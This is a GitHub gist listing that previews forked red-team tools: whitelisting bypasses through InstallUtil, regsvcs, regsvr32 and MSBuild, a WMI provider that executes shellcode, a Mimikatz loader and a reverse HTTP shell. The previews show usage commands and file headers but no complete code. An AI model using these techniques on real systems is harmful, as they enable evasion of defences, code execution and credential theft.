TheWover
/ ProcessArmor.cs
Created
February 19, 2019 19:36
— forked from nicholasmckinney/ProcessArmor.cs
Process Armor - Prevent users from killing your service or process
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.ComponentModel; | |
| using System.Security.AccessControl; | |
| using System.Security.Principal; | |
| using System.Runtime.InteropServices; | |
| using System.Configuration.Install; | |
TheWover
/ mimic.cs
Created
February 19, 2019 19:36
— forked from nicholasmckinney/mimic.cs
WMI execution via C#
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Management; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Step One: | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe mimic.cs | |
| Step Two: | |
| C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U mimic.exe |
TheWover
/ EvilWMIProvider.cs
Created
February 19, 2019 19:36
— forked from nicholasmckinney/EvilWMIProvider.cs
Evil WMI Provider
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Based On LocalAdmin WMI Provider by Roger Zander | |
| // http://myitforum.com/cs2/blogs/rzander/archive/2008/08/12/how-to-create-a-wmiprovider-with-c.aspx | |
| // Adapted For Evil By @subTee | |
| // Executes x64 ShellCode | |
| // | |
| // Deliver and Install dll | |
| // C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /i EvilWMIProvider.dll | |
| // Invoke calc for SYSTEM level calculations | |
| // Invoke-WmiMethod -Class Win32_Evil -Name ExecShellCalcCode | |
| // Invoke-WmiMethod -Namespace root\cimv2 -Class Win32_Evil -Name ExecShellCode -ArgumentList @(0x90,0x90,0x90), $null |
TheWover
/ regsvcs.cs
Created
February 19, 2019 19:36
— forked from nicholasmckinney/regsvcs.cs
Application Whiltelisting Bypass - regsvcs/regasm
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause | |
| Create Your Strong Name Key -> key.snk |
TheWover
/ dynwrap.js
Created
February 19, 2019 19:37
— forked from nicholasmckinney/dynwrap.js
RegistrationFree DynamicWrapperX
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" ); | |
| actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest"; | |
| try | |
| { | |
| var DX = actCtx.CreateObject("DynamicWrapperX"); | |
| DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function. | |
| res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function. | |
| } | |
| catch(e){ WScript.Echo("Fail");} |
TheWover
/ katz.cs
Created
February 19, 2019 19:38
— forked from nicholasmckinney/katz.cs
.NET 2.0.50727 Mimikatz Extract and Execute -
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.EnterpriseServices; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| using System.Security.Cryptography; |
TheWover
/ kernel.xml
Created
February 19, 2019 19:38
— forked from nicholasmckinney/kernel.xml
Blog Post Code - Attacking Drivers with MSBuild.exe.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe kernel.xml --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> | |
| <UsingTask | |
| TaskName="ClassExample" |
TheWover
/ JSRat.ps1
Created
February 19, 2019 19:42
— forked from nicholasmckinney/JSRat.ps1
Fileless JavaScript Reverse HTTP Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| Author: Casey Smith @subTee | |
| License: BSD3-Clause | |
| .SYNOPSIS | |
| Simple Reverse Shell over HTTP. Execute Commands on Client. | |
TheWover
/ gist:f8b65feea36e08c9f8641889182b762f
Created
February 19, 2019 19:43
— forked from nicholasmckinney/gist:3d748d6c3d7d52ce37479f7ef96a5478
DynaCall Article Dr Dobbs, November 1998
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
|  | |
| An Automation Object for Dynamic DLL Calls | |
| Here's an OLE automation object for dynamically declaring and accessing functions in external DLLs | |
| November 01, 1998 URL:http://www.drdobbs.com/windows/an-automation-object-for-dynamic-dll-cal/210200078 Jeff Stong has been developing DOS, Windows, and Windows NT based applications for 10 years. Jeff can be contacted at Jeff_V_Stong@msn.com. | |
| You can access external DLLs from Visual Basic by using the Declare statement to declare the name of the function you want to call and the DLL that it resides in. VBScript, however, doesn't support the Declare statement. This article presents an OLE automation object that lets VBScript (or any other environment that can access automation objects) dynamically declare and access functions in external DLLs. | |
| Using the DynamicWrapper Object |
TheWover
/ evil.cs
Created
February 19, 2019 19:44
— forked from nicholasmckinney/evil.cs
Execute a DLL via Regsvr32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| using RGiesecke.DllExport; | |
| namespace Export | |
| { | |
| class Test | |
| { |